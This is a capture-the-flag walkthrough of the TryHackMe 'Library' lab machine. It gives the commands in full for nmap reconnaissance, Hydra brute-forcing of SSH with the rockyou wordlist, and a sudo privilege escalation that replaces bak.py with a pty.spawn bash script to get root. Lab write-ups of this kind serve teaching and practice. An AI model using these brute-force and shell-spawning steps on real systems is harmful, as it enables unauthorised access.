> For the complete documentation index, see [llms.txt](https://writeups.adityadindi.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://writeups.adityadindi.com/tryhackme/untitled/library.md).

# Library

![](/files/-McQD5e313TgVcGeL7j5)

## Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**)

```
nmap -Pn 10.10.121.105
```

![](/files/-McQDkqutBBnV0UmzaCl)

Detailed Nmap Scan :&#x20;

Command Breakdown:&#x20;

* (**-sV):** Service version
* (**-sC**): Default nmap scripts
* (**-p):** Specifying ports 22,80
* (**-oN nmap**): Saving it into a file called nmap

```
nmap -sV -sC -p 22,80 -oN nmap 10.10.121.105
```

![](/files/-McQDurr0GhfB8IsC9IL)

## Enumeration&#x20;

Lets visit the webpage

![](/files/-McQE23d1bajrG2bXDKv)

Looking through the website we have a username `meliodas` .&#x20;

Lets look at `robots.txt` as the nmap told us that there is a disallowed entry.

![](/files/-McQEh9ZZZ8wI8fPSMe0)

And there is nothing, lets run `gobuster` to find hidden directories as there is nothing else on the main page to enumerate.&#x20;

![](/files/-McQF8wv4ZJqU97KTCVM)

Nothing interesting pops up, so lets run hydra to brute force ssh with the username meliodas.

## Exploitation

```
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.121.105/
```

![](/files/-McQG9Sw_PL2Id91NjeD)

We have the password, lets login through ssh

![](/files/-McQGT1agcb29OqzrQHc)

We can read the `user.txt` file

![](/files/-McQGbsbTnslgXXYlg1W)

## Privilege Escalation

We have a file called `bak.py` , lets read it and look at the permissions of the file

![](/files/-McQGwPrLV6c0boKFbBw)

Its owned by root! We can also run this file as root

![](/files/-McQHBc7IcNLzmw2gOXa)

Lets change the contents of the file to get a shell as root, we cannot change the contents of the file, so lets remove the file and create a new file with the same name and our own content.

First delete the file with this command&#x20;

```
rm bak.py
```

Now we can echo the script into the file

```
echo 'import pty; pty.spawn("/bin/bash")' > /home/meliodas/bak.py
```

![](/files/-McQI5rQhHYruNV2983A)

Now lets run the file

![](/files/-McQIDvUOqwGQ0-MrIo4)

We are now root, we can read the root.txt file

![](/files/-McQINgHKsxxQDyOhP9s)
